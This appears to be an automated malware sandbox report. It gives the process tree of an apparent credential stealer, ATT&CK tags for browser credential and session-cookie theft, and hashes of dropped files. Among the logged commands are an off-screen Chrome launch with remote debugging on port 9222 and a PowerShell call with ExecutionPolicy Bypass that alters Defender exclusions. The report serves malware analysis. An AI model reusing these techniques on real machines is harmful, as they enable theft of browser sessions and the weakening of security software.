- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5108
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"3⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe30fbdcf8,0x7ffe30fbdd04,0x7ffe30fbdd104⤵PID:1772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1448,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2152 /prefetch:114⤵PID:4752
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2172,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2168 /prefetch:24⤵PID:2520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2304,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2328 /prefetch:134⤵PID:2860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3292,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3340 /prefetch:14⤵
- Uses browser remote debugging
PID:928
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3300,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3360 /prefetch:14⤵
- Uses browser remote debugging
PID:5036
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4264,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4300 /prefetch:94⤵
- Uses browser remote debugging
PID:2604
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4772,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4756 /prefetch:14⤵
- Uses browser remote debugging
PID:2448
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4892,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4928 /prefetch:144⤵PID:3020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5032,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5044 /prefetch:144⤵PID:1452
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"2⤵
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1660
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:3876
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2168
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4296
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:3528
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:5096
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.131⤵
- Modifies registry class
PID:2132
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1Windows Management Instrumentation
1Persistence
Event Triggered Execution
1Netsh Helper DLL
1Modify Authentication Process
1Defense Evasion
Direct Volume Access
1Hide Artifacts
1Ignore Process Interrupts
1Indicator Removal
3File Deletion
3Modify Authentication Process
1Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5d1457b72c3fb323a2671125aef3eab5d
SHA15bab61eb53176449e25c2c82f172b82cb13ffb9d
SHA2568a8de823d5ed3e12746a62ef169bcf372be0ca44f0a1236abc35df05d96928e1
SHA512ca63c07ad35d8c9fb0c92d6146759b122d4ec5d3f67ebe2f30ddb69f9e6c9fd3bf31a5e408b08f1d4d9cd68120cced9e57f010bef3cde97653fed5470da7d1a0
-
Filesize
40B
MD51d6d1e773c2cb63516dc875f48b6b40c
SHA180bcca5dd15ffceb74ffe8b17a31e5d46da41473
SHA2562e7ec8cb08e6856724817c7e0a64c9f38118ceb1c4c79f751ac31640a9e230d1
SHA512becd167da74904fbdf8540b4d3782bc20c4f8551afa7c6261d1a8fff797bb160a5e3334bef30dc79a4d5416700055623e3f279e8b4c4bc4c0041bc49d16cb119
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log
Filesize87B
MD5e4a639b9d8bf7a90cc97bb4e05a36753
SHA1676facdabf06e5f014e95218bfc02b8c18c39284
SHA25679da0e95b23e5777bee595201fead887021d71ddaffa79dac8d5cf03a646b8cd
SHA5124a254245e0af42a2a86647ed24301f4f82a72c0dedad67df32317c2acdb8a7f2e5db8336871611419776e6a1cc1c35933cc5f4cb16648b51b6a401a14087d104
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
3KB
MD5662e55efd63947ac1ed9ab166fde4448
SHA1ffdefed29e194510e0c86cb9063c2b6bf4b87223
SHA25645e102a0dd571dc77afbf39c16f4007c44d643c58168b299f3a69a4769fb3793
SHA51260b54ae86eb59911b0c2bd5f2420961fceaac2e3140039c9139c65902dfbf63eb8f19dec2ac4674d6c6b3dd2b4082e461bc53556912f7eb8f634d66c17cc0d1a
-
Filesize
289B
MD5541c42f1c98b3e1b011d22eba854e707
SHA1db30188de1f22e3077e7044be1386a5d0ecaed9d
SHA2560768e811c51ac61a8e573ac6b53f89dbb1d89eb2fcf62536a9a5f730329c584b
SHA51247828c1b40deb8d37d6ff4fc8f7673fbb59b40e07f54f0fa4121b91941160134c251e20f7f28f7ee5185f3c8aee2b7e95a1bef573bc64c68912016accbe90604
-
Filesize
17KB
MD54786cf24e3e07c212272a4c2c0aa6aad
SHA16948ce944e1dde09aafee35b61b7fee15537a785
SHA25601637344a86333f59012fe115b1be0a8366587e176809918a2723a6878a23cdc
SHA5126434ad876770eb4bb9e91c4ebb206c41f3b4d0d715ec363c8669d4b595fdd740ac3004855d482c71588f1f7bd4762d427974a4fce31dc50ad633d84d4f132654
-
Filesize
1KB
MD556220f7b661c85b776763c1a0f189326
SHA164e8d4898867dafa9de8b87862808a1ac05a1239
SHA2566371d04275f796eebfdf9ab3c879f32a58af4cb04001598b8d109836b864b872
SHA5123071338a1f5c80016f409105efd2367baa4f3742bdaaf41a97794f66670f246ff24f3c11c2fc26e5d33c17f33c3d19a2301fcf4be8ca239f0a903c3b8a2892db
-
Filesize
80KB
MD538e61cfd456cf804da8e5d148eacf796
SHA10350a98c12d3b1996feca7f0c52be22dcb6079b3
SHA2560f9fbf41d1153581a399ba5a5b1a3b785a4351161d6d650d19165a43f64185d8
SHA51296ac64dc5a0b4e9e4b5314d83a21ab725ed64d45579875bf8f4a62401d13c598b9f6535b431f55198983830daa750467153643a0140e15d9ec4377db043c5eae
-
Filesize
226B
MD54ae344179932dc8e2c6fe2079f9753ef
SHA160eacc624412b1f34809780769e3b212f138ea9c
SHA2563063de3898a9b34e19f8cf0beeec2b8bd6bd05896b52abd73f4703d07b8a7cd4
SHA512fadfe2b83f1af8fdc50430325f69d6172d2c1e889ca3800b3b83e5535d5970c32e9a176b48563275a0630d56c96d9f88df148fd6b2d281f0fc58129e5f4dba19
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
944B
MD505b3cd21c1ec02f04caba773186ee8d0
SHA139e790bfe10abf55b74dfb3603df8fcf6b5e6edb
SHA256911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8
SHA512e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb
-
Filesize
1KB
MD5318b7468f95ad6548bb6b631a14863dd
SHA177e835ce5092cf8d6b04dbb42a2f4c66e63a1557
SHA256dd795b9f7d426c42a8f35cda8e2223c41a5b41560cff651ae2ec89f9aeb16555
SHA5120fe428f2607bceae4bd947417aa68dcff8eaf3bc328c88904fd0cc6a1b2e1ec9eda7fb216783476b811ea0a12199fea54751c9ba5e4d746c7c6f0a9a888ef76f
-
Filesize
1KB
MD5dd3474e6a72c08266c25f196f78b13fd
SHA1b70c6bbd7794b49b6b9afa6343987a7f553d1268
SHA25682acd1c6613bb2c907a26be1f61f6556ee03cabf1aa73dad27d012be88e05318
SHA512cf5138ab09f19034fa5d058819956fd0556c56d674268e496dbaded228839d2be576bd74cda26127adf03cce9a8ab485ce6a07c7332a2c65a77ca9b56d92c79d
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\267aad0b-2fdd-4292-8bff-59b3a5d8a384.down_data
Filesize555KB
MD55683c0028832cae4ef93ca39c8ac5029
SHA1248755e4e1db552e0b6f8651b04ca6d1b31a86fb
SHA256855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e
SHA512aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3
-
Filesize
407KB
MD5b077dab664a004215814a4391b6dde66
SHA1c3c2f1138317225ae98f616b080370cefa082c18
SHA256726afcaa627b24e176cec78f636df4a66847f0716ea0e1161745d0c5616b5bae
SHA5122927dd7361048783dba4324def7859b72b415045272278064dbfb024251b22e899e7b4f603f2b59d312855a9674c6ad2d2068eee7811e7079bc00a91fc5cc247
-
Filesize
23B
MD5f19d961388cd1c4572942a4f1397d15d
SHA195a89992f4fe50c0a6f4351c3f93c14487087844
SHA256052caba139f51903bc4994a3cace4e65c87fd093b6efec8141e4a6c4625e380d
SHA51266a82f3216189a50df4ca19194a1eda2989e6635fc115508d9c0b2a33b3345f657a17214c52ed78999eb8a3e571199e70c3ae4854deaa7eb1f380af7f6f8fb09
-
Filesize
19B
MD5c5b94f01b5b97e31f9cec28fecefe0b1
SHA15a2f650235d6319696f02a10a0393b47dbddcd81
SHA256bf9eec15e97a4addb7f3b9a15f2de3b5499428750e3ecf1cbad5e3bad5e00548
SHA5128e6a75963a9e613ee3a5fe4032c42898904426c19541ec54404811482ef8aac4f84ff23bd80d72f0d33215dcde7d008fcd4687c79ba35cac5b4240c5ad5b109b
-
Filesize
17B
MD5964d5571d9a4fec576fe454162f2e844
SHA16234d1102a5012094dc8818bc045f7890d270905
SHA2566cfad5b342f80a79633747ee591775dbf46be34fbc793930e5de9aab7afb9995
SHA512402b81b47e62fa0d2b993eb01df725d1f3ec826ed76c0ac17d5ebaed048e6c7556ac2e1b3c0141e2347386cb5c7c74377c37f990ba9b5745f388181153b8a46c
-
Filesize
17B
MD5b80546283f231ee762dee4b33b0aa091
SHA1ec5a0f5581d8d9e9784f82b77e4e0eb187d78301
SHA256188352fe4a40938e0918eed1c4b0ae7266fb13c9de77330e04f192711d15c6f8
SHA512df1519614443b80b22a601ca4f1b4119eeaef0715fe913dd327a7c247986cba16cbbd7f55e32ea0557b5e5338897c0f82ac23e91d69836ad280c7f587d863d51
-
Filesize
19B
MD5c4efd9a7b61ebf43b608440be5e33369
SHA1926418256c277f1b11b575ec6e92ce6a844612f7
SHA256ed4280859199da5a8f25c0c6d533d0873460ac63368c14a69bbd863ea4bfb30f
SHA5129ea97363868d61d3d51bd3804d638b71ba8dc65260800b3a54051b4725cf08e9d9880a12422a549d94a339c7267e858a7ff5ca9428d64051657134b5c6c20745
-
Filesize
81B
MD5ea511fc534efd031f852fcf490b76104
SHA1573e5fa397bc953df5422abbeb1a52bf94f7cf00
SHA256e5fe7f327ae62df007bd1117aa7f522dbbcd371ec67953f66d786424cb1d7995
SHA512f7d8e575a2332b0fbd491b5e092b7ed6b0942a5165557fcc5d215d873b05103aa6ba01843133871c1c7ac81b10182a15895be49885c98d1a379dd55f88004fae
-
Filesize
407KB
MD53625ed17a6255827969ad5a404f0e41e
SHA187922c687d7c31aef6b20da03c4621b03a617028
SHA256c7fcc119a5fcf6b96a186e837887c22c2d1b59de5fb3c263911843f9cc6b9be3
SHA5124bd2de013dad5a094a3a28fe171fc0ebe97dfcda5413fc3d0d1f0aced57cc892d0a0835708e42cae720c71befa02604590638cc9ba2f4b260abf14b5d67bfc16
-
Filesize
354B
MD520a03bf7481ae6484d0623abb566212c
SHA108e6067ea2ec07126473066a53855d1f743718bd
SHA25644cdd1e35dba8a35672a3f58067b50932f4088298f5e1ecf9a448b3e73380ee7
SHA512e3d12f0c103268ae5030345e38c49daa90f6e41c9d9b6294fe97fa0e0032c732682f6e27356ffbbf1611c3e8482dfccefc0859444d054fcbc3c826d649b8dd34
-
Filesize
4KB
MD5aaafa9bad52c6b8832bfe6049e3ea677
SHA17c079d194986f77a65bfa3d8f22168e9b584f477
SHA256bd4bdcc0eb7b4567b94b146b2c36c5e4c423eb3606475b795c64171591fc31aa
SHA5123d5420df3a27cc8aa9902294b8ae5990e3bdb718a71dc1387546a4b6db444a46d9db25401a391a2c50e0bf528870366fd98144eb5d0ebeb6b4dc7ee64cb91b9b
-
Filesize
5KB
MD5368d379c84bd87dc5750b0a91088f604
SHA13949b00b0abddba67fe05fb8f1c02b22c519eca4
SHA25675e31026665a23adfaebf4ab95f2f5e45f59500c0dcc762502bb4a234b5dbcbf
SHA5129074f42972b6e523ba89528d3a6b147ca5cafedb16920a612306a6c9bb764dd09320fb8d05df1aa34e85d72e59ab32d537900dffb86a00aadceec4ddd94150cd
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
137KB
MD57605fb5c749eeea0b1b27fdaad78051c
SHA128388bf016af085bbcbacf8c516853942f6ec8d3
SHA256466a92e378a95752870abddd6af278fba89c5fef2cb3adfe2c4c114b9bd7cd93
SHA5121a3780652e092bd0be5c45cf034b2d0737324009c4d7d74e5cca193f75f285be85fa1631a68c6955566206dc3d51ba2dab9c4acfc74f9652ed2c04976ae3ee54
-
Filesize
250KB
MD53252df0bec85cdcd3668d703ceaf09ce
SHA1672366ae8df248c078db68a226d1fbf564d2f8ea
SHA25602fa2665e5759db60b61da15b757150eda402ff6063a30a855a337d813fe8229
SHA512179cab2e7d2cdc2cadc7a20986751007c10e6650069152df23d13bc1fef9fe5e066356f21825a325d34ea091c2b4e0766df1fabee8797da11a73de18dc46370f
-
Filesize
780B
MD560d646f40556d78166ad8111d850fc51
SHA1babaaf0762000dbf4b3f7a93beb35b6d9279d94d
SHA256a66f43f9660c0b16c59eb22b1037c19af06f89d875344446cc63e90437f78fab
SHA5123fb8acd626a012402669e42e760dd5b0efe2d2a37f3e71310c4a80a14491ee973713fcb0d90f99d40f0749c1dd16e8153afcb757e25de34c9ec9c82a58e81bc6